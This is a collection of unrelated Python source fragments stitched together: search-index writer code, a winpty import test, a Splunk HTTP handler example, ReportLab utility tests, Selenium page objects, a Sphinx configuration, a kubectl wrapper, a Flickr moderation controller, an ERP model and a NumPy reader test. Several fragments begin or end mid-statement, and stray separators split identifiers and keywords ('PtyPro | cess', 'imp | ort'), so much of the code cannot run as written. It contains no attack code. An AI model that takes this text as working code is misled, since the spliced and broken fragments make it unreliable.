length = (reader.doc_field_length(docnum, fieldname, 0)
if field.scorable else 0)
perdocwriter.add_field(fieldname, field, d.get(fieldname),
length)
if field.vector and reader.has_vector(docnum, fieldname):
v = reader.vector(docnum, fieldname)
perdocwriter.add_vector_matcher(fieldname, field, v)
# Finish the new document
perdocwriter.finish_doc()
newdoc += 1
def _merge_fields(self, reader, docmap):
# Add inverted index postings to the pool, renumbering document number
# references as necessary
add_post = self.pool.add
# Note: iter_postings() only yields postings for undeleted docs
for p in renumber_postings(reader, self.docnum, docmap):
add_post(p)
def add_reader(self, reader):
self._check_state()
# Make a docnum map to renumber around deleted documents
docmap, newdoc = self._make_docmap(reader, self.docnum)
# Add per-document values
self._merge_per_doc(reader, docmap)
# Add field postings
self._merge_fields(reader, docmap)
self.docnum = newdoc
self._added = True
def _check_fields(self, schema, fieldnames):
# Check if the caller gave us a bogus field
for name in fieldnames:
if name not in schema:
raise UnknownFieldError("No field named %r in %s"
% (name, schema))
def add_document(self, **fields):
self._check_state()
perdocwriter = self.perdocwriter
schema = self.schema
docnum = self.docnum
add_post = self.pool.add
docboost = self._doc_boost(fields)
fieldnames = sorted([name for name in fields.keys()
if not name.startswith("_")])
self._check_fields(schema, fieldnames)
perdocwriter.start_doc(docnum)
# For each field...
for fieldname in fieldnames:
value = fields.get(fieldname)
if value is None:
continue
field = schema[fieldname]
length = 0
if field.indexed:
# |
import sublime
import unittest
import os
import sys
class TestImport(unittest.TestCase):
mpath = None
@classmethod
def setUpClass(cls):
basedir = os.path.dirname(__file__)
mpath = os.path.normpath(os.path.join(
basedir, "..", "st3_{}_{}".format(sublime.platform(), sublime.arch())))
if mpath not in sys.path:
cls.mpath = mpath
sys.path.append(mpath)
def test_import(self):
from winpty import PtyPro | cess
self.assertTrue("winpty" in sys.modules)
proc = PtyProcess.spawn('cmd.exe')
self.assertTrue(proc.isalive())
proc.terminate(True)
@classmethod
def tearDownClass(cls):
if not cls.mpath:
return
mpath = cls.mpath
if mpath in sys.path:
| sys.path.remove(mpath)
if "winpty" in sys.modules:
del sys.modules["winpty"]
|
#!/usr/bin/env python
#
# Copyright 2011 Splunk, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"): you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the speci | fic language governing permissions and limitations
# under the License.
"""Example of a ur | llib2 based HTTP request handler."""
from pprint import pprint
from StringIO import StringIO
import sys
import urllib2
import splunk.client as client
import utils
def request(url, message, **kwargs):
method = message['method'].lower()
data = message.get('body', "") if method == 'post' else None
headers = dict(message.get('headers', []))
context = urllib2.Request(url, data, headers)
try:
response = urllib2.urlopen(context)
except urllib2.HTTPError, response:
pass # Propagate HTTP errors via the returned response message
return {
'status': response.code,
'reason': response.msg,
'headers': response.info().dict,
'body': StringIO(response.read())
}
opts = utils.parse(sys.argv[1:], {}, ".splunkrc")
service = client.connect(handler=request, **opts.kwargs)
pprint(service.apps.list())
|
#Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
"""Tests for reportlab.lib.utils
"""
__version__=''' $Id$ '''
from reportlab.lib.testutils import setOutDir,makeSuiteForClasses, printLocation
setOutDir(__name__)
import os, time, sys
import reportlab
import unittest
from reportlab.lib import colors
from reportlab.lib.utils import recursiveImport, recursiveGetAttr, recursiveSetAttr, rl_isfile, \
isCompactDistro, isPy3
def _rel_open_and_read(fn):
from reportlab.lib.utils import open_and_read
from reportlab.lib.testutils import testsFolder
cwd = os.getcwd()
os.chdir(testsFolder)
try:
return open_and_read(fn)
finally:
os.chdir(cwd)
class ImporterTestCase(unittest.TestC | ase):
"Test import utilities"
count = 0
def setUp(self):
from reportlab.lib.utils import get_rl_tempdir
| s = repr(int(time.time())) + repr(self.count)
self.__class__.count += 1
self._tempdir = get_rl_tempdir('reportlab_test','tmp_%s' % s)
if not os.path.isdir(self._tempdir):
os.makedirs(self._tempdir,0o700)
_testmodulename = os.path.join(self._tempdir,'test_module_%s.py' % s)
f = open(_testmodulename,'w')
f.write('__all__=[]\n')
f.close()
if sys.platform=='darwin' and isPy3:
time.sleep(0.3)
self._testmodulename = os.path.splitext(os.path.basename(_testmodulename))[0]
def tearDown(self):
from shutil import rmtree
rmtree(self._tempdir,1)
def test1(self):
"try stuff known to be in the path"
m1 = recursiveImport('reportlab.pdfgen.canvas')
import reportlab.pdfgen.canvas
assert m1 == reportlab.pdfgen.canvas
def test2(self):
"try under a well known directory NOT on the path"
from reportlab.lib.testutils import testsFolder
D = os.path.join(testsFolder,'..','tools','pythonpoint')
fn = os.path.join(D,'stdparser.py')
if rl_isfile(fn) or rl_isfile(fn+'c') or rl_isfile(fn+'o'):
m1 = recursiveImport('stdparser', baseDir=D)
def test3(self):
"ensure CWD is on the path"
try:
cwd = os.getcwd()
os.chdir(self._tempdir)
m1 = recursiveImport(self._testmodulename)
finally:
os.chdir(cwd)
def test4(self):
"ensure noCWD removes current dir from path"
try:
cwd = os.getcwd()
os.chdir(self._tempdir)
import sys
try:
del sys.modules[self._testmodulename]
except KeyError:
pass
self.assertRaises(ImportError,
recursiveImport,
self._testmodulename,
noCWD=1)
finally:
os.chdir(cwd)
def test5(self):
"recursive attribute setting/getting on modules"
import reportlab.lib.units
inch = recursiveGetAttr(reportlab, 'lib.units.inch')
assert inch == 72
recursiveSetAttr(reportlab, 'lib.units.cubit', 18*inch)
cubit = recursiveGetAttr(reportlab, 'lib.units.cubit')
assert cubit == 18*inch
def test6(self):
"recursive attribute setting/getting on drawings"
from reportlab.graphics.charts.barcharts import sampleH1
drawing = sampleH1()
recursiveSetAttr(drawing, 'barchart.valueAxis.valueMax', 72)
theMax = recursiveGetAttr(drawing, 'barchart.valueAxis.valueMax')
assert theMax == 72
def test7(self):
"test open and read of a simple relative file"
b = _rel_open_and_read('../docs/images/Edit_Prefs.gif')
def test8(self):
"test open and read of a relative file: URL"
b = _rel_open_and_read('file:../docs/images/Edit_Prefs.gif')
def test9(self):
"test open and read of an http: URL"
from reportlab.lib.utils import open_and_read
b = open_and_read('http://www.reportlab.com/rsrc/encryption.gif')
def test10(self):
"test open and read of a simple relative file"
from reportlab.lib.utils import open_and_read, getBytesIO
b = getBytesIO(_rel_open_and_read('../docs/images/Edit_Prefs.gif'))
b = open_and_read(b)
def test11(self):
"test open and read of an RFC 2397 data URI with base64 encoding"
result = _rel_open_and_read('data:image/gif;base64,R0lGODdhAQABAIAAAP///////ywAAAAAAQABAAACAkQBADs=')
self.assertEquals(result,b'GIF87a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\xff\xff\xff,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;')
def test12(self):
"test open and read of an RFC 2397 data URI without an encoding"
result = _rel_open_and_read('data:text/plain;,Hello%20World')
self.assertEquals(result,b'Hello World')
def testRecursiveImportErrors(self):
"check we get useful error messages"
try:
m1 = recursiveImport('reportlab.pdfgen.brush')
self.fail("Imported a nonexistent module")
except ImportError as e:
self.assertIn('reportlab.pdfgen.brush',str(e))
try:
m1 = recursiveImport('totally.non.existent')
self.fail("Imported a nonexistent module")
except ImportError as e:
self.assertIn('totally',str(e))
try:
#import a module in the 'tests' directory with a bug
m1 = recursiveImport('unimportable')
self.fail("Imported a buggy module")
except Exception as e:
self.assertIn(reportlab.isPy3 and 'division by zero' or 'integer division or modulo by zero',str(e))
def makeSuite():
return makeSuiteForClasses(ImporterTestCase)
if __name__ == "__main__": #noruntests
unittest.TextTestRunner().run(makeSuite())
printLocation()
|
# ############################################################################
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2019 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
# ############################################################################
import pypom
from selenium.common.exceptions import NoSuchElementExcepti | on
from selenium.webdriver.common.by import By
from features.pages.common import CommonPageMixin
from features.fields.fields import InputField, SelectField, ButtonField
class SearchEntityPage(CommonPageMixin, pypom.Page):
URL_TEMPLATE = '/entities/'
| acronym = InputField(By.ID, 'id_acronym')
title = InputField(By.ID, 'id_title')
entity_type = SelectField(By.ID, "id_entity_type")
search = ButtonField(By.ID, "bt_submit_entity_search")
def find_acronym_in_table(self, row: int = 1):
return self.find_element(By.ID, 'td_entity_%d' % row).text
class SearchOrganizationPage(CommonPageMixin, pypom.Page):
URL_TEMPLATE = '/organizations/'
acronym = InputField(By.ID, 'id_acronym')
name = InputField(By.ID, 'id_name')
type = SelectField(By.ID, "id_type")
search = ButtonField(By.ID, "bt_submit_organization_search")
def find_acronym_in_table(self, row: int = 1):
return self.find_element(By.ID, 'td_organization_%d' % row).text
class SearchStudentPage(CommonPageMixin, pypom.Page):
URL_TEMPLATE = '/students/'
registration_id = InputField(By.ID, 'id_registration_id')
name = InputField(By.ID, 'id_name')
search = ButtonField(By.ID, "bt_submit_student_search")
def find_registration_id_in_table(self, row: int = 1):
return self.find_element(By.ID, 'td_student_%d' % row).text
def find_name_in_table(self):
names = []
row = 1
last = False
while not last:
try:
elt = self.find_element(By.ID, 'spn_student_name_%d' % row)
names.append(elt.text)
row += 1
except NoSuchElementException as e:
return names
return names
|
# -*- coding: utf-8 -*-
#
# tm1640-rpi documentation build configuration file, created by
# sphinx-quickstart on Fri Apr 12 19:52:17 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../src/python/'))
# hack for readthedocs to cause it to run doxygen first
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
from subprocess import call
call('doxygen')
del call
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'breathe']
breathe_projects = {'tm1640-rpi': 'doxygen-xml/'}
breathe_default_project = 'tm1640-rpi'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'tm1640-rpi'
copyright = u'2013, Michael Farrell'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes. |
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each them | e, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'tm1640-rpidoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'tm1640-rpi.tex', u'tm1640-rpi Documentation',
u'Michael Farrell', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'tm1640-rpi', u'tm1640-rpi Documentation',
[u'Michael Farrell'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'tm1640-rpi', u'tm1640-rpi Documentation',
u'Michael Farrell', 'tm1640-rpi', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
autoclass_content = 'both'
|
# encoding: utf-8
import json
import time
from kubectl_data import *
from kubectl_ports import *
from kubectl_wrapper import *
TMP_FILEPATH = '/tmp/'
def create_tmp_json(data, service_path):
with open(service_path, 'w') as out:
json.dump(data, out, indent=2)
def sub_start(service_name, data, kube_type):
filepath = TMP_FILEPATH + service_name + '-' + kube_type + '.json'
kube_data = data.get(kube_type, dict())
create_tmp_json(kube_data, filepath)
create(filepath)
def sub_stop(service_name, data, kube_type):
filepath = TMP_FILEPATH + service_name + '-' + kube_type + '.json'
kube_data = data.get(kube_type, dict())
create_tmp_json(kube_data, filepath)
delete(filepath)
'''
Actions
'''
def kubectl_used_ports(subdomain):
return get_used_ports(subdomain)
def kubectl_available_ports(subdomain):
return get_available_ports(subdomain)
def kubectl_register(filepath):
data = get_data_yaml(filepath)
register_data(data)
def kubectl_start(service_name):
data = get_data(service_name)
sub_start(service_name, data, 'service')
time.sleep(1)
sub_start(service_name, data, 'replicationcontroller')
def kubectl_stop(service_name):
data = get_data(service_name)
sub_stop(service_name, data, 'replicationcontroller')
sub_stop(service_name, data, 'service')
time.sleep(1)
def kubectl_list():
return get_all_names()
def kubectl_startall():
services = get_all_names()
for service in services:
kubectl_start(service)
def kubectl_status(ressources, all_namespaces):
return status(ressources, all_namespaces)
def kubectl_status_nodes():
return nodes()
def kubectl_logs(service_name, f):
pods = pods_name_from_la | bel(service_name)
pods_list = filter(lambda x: x != '', pods.split('\n'))
if not pods_list:
print 'No pods found'
return
elif len(pods_list) > 1:
format_list = '\n'.join(pods_list) + '\n\nName: '
answer = raw_input('Multiple pods under this service, please choose one by selecting the name: \n' + format_list)
return logs(answer, f)
else:
pod_name = pods_list[0].split(' ')[0]
| return logs(pod_name, f)
def kubectl_describe(service_name):
found_pods_and_exec_func(service_name, describe)
def kubectl_connect(service_name):
found_pods_and_exec_func(service_name, connect)
|
"""
Configuration for bookmarks Django app
"""
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
from edx_django_utils.plugins import PluginSettings | , PluginURLs
from openedx.core.djangoapps.plugins.constants import ProjectType, SettingsType
class BookmarksConfig(AppConfig):
"""
Configuration class for bookmarks Django app
"""
name = 'openedx.core.djangoapps.bookmarks'
verbose_name = _("Bookmarks")
plugin_app | = {
PluginURLs.CONFIG: {
ProjectType.LMS: {
PluginURLs.NAMESPACE: '',
PluginURLs.REGEX: '^api/bookmarks/',
PluginURLs.RELATIVE_PATH: 'urls',
}
},
PluginSettings.CONFIG: {
ProjectType.LMS: {
SettingsType.PRODUCTION: {PluginSettings.RELATIVE_PATH: 'settings.production'},
SettingsType.COMMON: {PluginSettings.RELATIVE_PATH: 'settings.common'},
}
}
}
def ready(self):
# Register the signals handled by bookmarks.
from . import signals # lint-amnesty, pylint: disable=unused-import
|
import logging
from pylons import config, request, response, session, tmpl_context as c
from pylons.controllers.util import abort
from fmod.lib.base import BaseController, render
from fmod import model
from sqlalchemy import desc
log = logging.getLogger(__name__)
from hashlib import md5
import time, datetime
#useful for this case.
from fmod.model import Ping, ImageHistory
from flickrapi import FlickrAPI
class PingController(BaseController):
def index(self):
c.results=[]
c.username = session.get('user')
c.fl_mod = session.get('mod',False)
images = {}
flSave = False
for ping in Ping.query().filter(Ping.fl_decided==False).order_by(Ping.id):
if not images.get(ping.image):
img = ping.Image_fromPing()
if img.in_pool():
images[ping.image] = True
c.results.append(ping)
if len(c.results) >= 2:
break
else:
flSave=True
ping.fl_decided=True
if flSave: ping.commit()
return render('ping.mako')
def more(self, id=None):
# id will be something like d_ping_[ping.id]
# so, I want to get a ping where id > that one.
pid = id.split('_')[-1]
try:
pid = int(pid)
except:
log.debug("couldn't identify the ping %s "%id)
return ""
c.username = session.get('user')
c.fl_mod = session.get('mod',False)
filter_images = dict([(ping.image,True) for ping in
Ping.query().filter(Ping.fl_decided==False).filter(Ping.id<=pid)])
for ping in Ping.query().filter(Ping.fl_decided==False).filter(Ping.id>pid).order_by(Ping.id):
if not ping.image in filter_images:
img = ping.Image_fromPing()
if img.in_pool():
c.ping=ping
c.image=ping.image
c.atts = img.all_atts()
return render('one_ping.mako')
else:
ping.fl_decided=True
ping.commit()
def _fmtTime(self, t=None):
if t!= None and hasattr(t, 'timetuple'):
t = time.mktime(t.timetuple())
return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(t))
def rss(self):
response.charset='utf8'
response.headers['content-type'] = 'text/xml; charset=UTF-8'
c.items=[]
images = {}
for ping in Ping.query().filter(Ping.fl_decided==False).order_by(desc(Ping.id)):
if not images.get(ping.image):
img = ping.Image_fromPing()
if img.in_pool():
images[ping.image] = True
img.all_atts()
c.items.append((ping,img))
if len(c.results) >= 20:
break
c.fmtTime = self._fmtTime
return render('rss.mako')
def ping(self):
log.debug('In Ping')
params = {'nsid':'nsid', # the pinging user, this is static.
'uid':'username', # our userid
'id' :'image', # image id
'own':'owner', # image owner
'sec':'secret', # image secret, from flickr
'con':'context', # context - in group pool
}
# 's':None # signature
# check sig --
nsid = request.params.get('nsid')
if nsid:
u = model.User.get_byNsid(nsid)
else:
u = model.User.get_byName(request.params.get('uid'))
if not u:
log.debug('user not found for ping: %s'%request.query_string)
return ''
log.debug(request.query_string)
log.debug(request.query_string[:-35]+u.secret)
log.debug(request.params.get('s'))
log.debug(md5(request.query_string[:-35]+u.secret).hexdigest().lower())
if md5(request.query_string[:-35]+u.secret).hexdigest().lower() != request.params.get('s'):
log.debug('bad signature')
return ''
else:
log.debug('good signature')
p = Ping()
for (arg, att) in params.items():
# must filter!!!
val = request.params.get(arg,'')
log.debug("setting %s to %s"% (att, val))
if val:
setattr(p, att, val)
p.username = u.username
#p.begin()
p.save()
p.commit()
if request.params.get('v',False) == '2':
#version 2 response.
response.headers['content-type'] = 'text/javascript'
return """YUI().use('node', function(Y) {Y.one('#context-num-pool-71917374__at__N00').insert(document.createTextNode(' (Flagged) '), 'before')})"""
else:
#version 1 response
""" q='uid='+uid+'&id='+p.id+'&own='+p.ownerNsid+'&sec='+p.secret+'&con='+nextprev_currentContextID;
i.src='http://192.168.10.99:5000/p?'+q+'s='+md5_calcMD5(q+s);
"""
response.headers['content-type'] = 'text/javascript'
return """Y.D.get('contextTitle_pool71917374@N00').appendChild(document.createTextNode('(Flagged)'))"""
def dup_scan(self):
log.debug('dup ping')
fapi = FlickrAPI(config['api_key'], config['api_secret'], token=config['api_token'])
try:
rsp = fapi.groups_pools_getPhotos(api_key=config['api_key'],
group_id=config['group_id'],
extras='last_update',
per_page='50',
page='1',
token=config['api_token'])
except Exception,msg:
log.debug(msg.args)
return False
photos = rsp.find('photos')
for photo | in photos.getchildren():
image = photo.get('id')
dt = int(photo.get('dateadded'))
if ImageHistory.get(image=image, dt=dt):
log.debug('found high water mark, quitting')
break
if ImageHistory.get_all(image=image):
log.debug('found a re-add')
p = Ping()
p.image = image
p.owner = photo.get('owner')
p.reason = "Bump"
p.username = 'RoboMod'
p.save()
Ping.commit | ()
ih = ImageHistory()
ih.image = image
ih.dt = dt
ih.save()
ImageHistory.commit()
return "successful"
|
from api imp | ort ServerError,NoAccessError,Simp | leTax
|
# !/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
ERP+
"""
__author__ = 'CVtek dev'
__credits__ = []
__version__ = "1.0"
__maintainer__ = "CVTek dev"
__status__ = "Development"
__model_name__ = 'sr_crianca.SRCrianca'
import auth, base_models
from orm import *
from form import *
class SRCrianca(Model, View):
def __init__(self, **kargs):
Model.__init__(self, **kargs)
self.__name__ = 'sr_crianca'
self.__title__ ='Inscrição e Identificação da Criança'
self.__model_name__ = __model_name__
self.__list_edit_mode__ = 'edit'
self.__get_options__ = ['nome'] # define tambem o campo a ser mostrado no m2m, independentemente da descricao no field do m2m
self.__order_by__ = 'sr_crianca.nome'
self.__tabs__ = [
('Pré-Natal', ['sr_pre_natal']),
('Neo-Natal', ['sr_neo_natal']),
('Irmãos', ['sr_crianca']),
]
#choice field com a estrutura de saude
self.numero_inscricao = integer_field(view_order = 1, name = 'Nº de Inscrição', size = 40)
self.primeira_consulta = date_field(view_order = 2, name = 'Primeira Consulta', size=40, args = 'required', default = datetime.date.today(), onlist = False)
self.nome = string_field(view_order = 3, name = 'Nome', size = 70, onlist = True)
self.sexo = combo_field(view_order = 4, name = 'Sexo', size = 40, default = 'Feminino', options = [('feminino','Feminino'), ('masculino','Masculino')], onlist = True)
self.data_nascimento = date_field(view_order = 5, name = 'Data Nascimento', size=40, args = 'required', onlist = True)
self.hora_nascimento = time_field(view_order=7, name ='Hora Nascimento', size=40, onlist=False, args='required')
self.numero_registo = string_field(view_order = 8, name = 'Nº Registo', size = 40, onlist = False)
| self.data_registo = date_field(view_order = 9, name = 'Data Registo', size=40, args = 'required')
self.nome_pai = string_field(view_order = 10, name = 'Nome do Pai', size = 60, onlist=False)
self.n | ome_mae = string_field(view_order = 11, name = 'Nome do Mãe', size = 60)
self.endereco_familia = text_field(view_order=12, name='Endereço Familia', size=70, args="rows=30", onlist=False, search=False)
self.telefone = string_field(view_order = 13, name = 'Telefone', size = 40, onlist = True)
self.estado = combo_field(view_order = 14, name = 'Estado', size = 40, default = 'active', options = [('active','Activo'), ('canceled','Cancelado')], onlist = True)
self.sr_pre_natal = list_field(view_order=15, name = 'Informações Pré-Natal', fields=['duracao_gravidez'], condition="crianca='{id}'", model_name='sr_pre_natal.SRPreNatal', list_edit_mode='inline', onlist = False)
self.sr_neo_natal = list_field(view_order=16, name = 'Informações Neo-Natal', column='local_parto', condition="sr_crianca='{id}'", model_name='sr_neo_natal.SRNeoNatal', list_edit_mode='inline', onlist = False) |
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Free University
# Berlin, 14195 Berlin, Germany.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Created on 07.04.2015
@author: marscher
'''
import unittest
import tempfile
import numpy as np
from pyemma.coordinates.data.numpy_filereader import NumPyFileReader
from pyemma.util.log import getLogger
import shutil
class TestNumPyFileReader(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.logger = getLogger(cls.__class__.__name__)
d = np.arange(3 * 100).reshape((100, 3))
d2 = np.arange(300, 900).reshape((200,3))
d_1d = np.random.random(100)
cls.dir = tempfile.mkdtemp(prefix='pyemma_npyreader')
cls.f1 = tempfile.mktemp(suffix='.npy', dir=cls.dir)
cls.f2 = tempfile.mktemp(suffix='.npy', dir=cls.dir)
cls.f3 = tempfile.mktemp(suffix='.npz', dir=cls.dir)
cls.f4 = tempfile.mktemp(suffix='.npy', dir=cls.dir)
# 2d
np.save(cls.f1, d)
np.save(cls.f4, d2)
# 1d
np.save(cls.f2, d_1d)
np.savez(cls.f3, d, d)
cls.files2d = [cls.f1, cls.f4] #cls.f3]
cls.files1d = [cls.f2]
cls.d = d
cls.d_1d = d_1d
cls.npy_files = [f for f in cls.files2d if f.endswith('.npy')]
cls.npz = cls.f3
return cls
@classmethod
def tearDownClass(cls):
shutil.rmtree(cls.dir, ignore_errors=True)
def test_only_npy(self):
reader = NumPyFileReader(self.npy_files)
from_files = [np.load(f) for f in self.npy_files]
concatenated = np.vstack(from_files)
output = reader.get_output()
self.assertEqual(reader.number_of_trajectories(), len(self.npy_files))
self.assertEqual(reader.n_frames_total(), concatenated.shape[0])
for x, y in zip(output, from_files):
np.testing.assert_array_almost_equal(x, y)
def test_small_chunks(self):
reader = NumPyFileReader(self.npy_files)
reader.chunksize = 30
from_files = [np.load(f) for f in self.npy_files]
concatenated = np.vstack(from_files)
output = reader.get_output()
self.assertEqual(reader.number_of_trajectories(), len(self.npy_files))
self.assertEqual(reader.n_frames_total(), concatenated.shape[0])
for x, y in zip(output, from_files):
np.testing.assert_array_almost_equal(x, y)
def testSingleFile(self):
reader = NumPyFileReader(self.npy_files[0])
self.assertEqual(reader.n_frames_total(), self.d.shape[0])
@unittest.skip("npz currently unsupported")
def test_npz(self):
reader = NumPyFileReader(self.npz)
all_data = reader.get_output()
fh = np.load(self.npz)
data = [x[1] for x in fh.items()]
fh.close()
self.assertEqual(reader.number_of_trajectories(), len(data))
for outp, inp in zip(all_data, data):
np.testing.assert_equal(outp, inp)
def test_stridden_access(self):
reader = NumPyFileReader(self.f1)
reader.chunksize = 10
wanted = np.load(self.f1)
for stride in [2, 3, 5, 7, 15]:
first_traj = reader.get_output(stride=stride)[0]
np.testing.assert_equal(first_traj, wanted[::stride],
"did not match for stride %i" % stride)
def test_lagged_stridden_access(self):
reader = NumPyFileReader(self.f1)
strides = [2, 3, 5, 7, 15]
lags = [1, 3, 7, 10, 30]
f | or stride in strides:
for lag in lags:
chunks = []
for _, _, Y in reader.iterator(stride, lag):
chunks.append(Y)
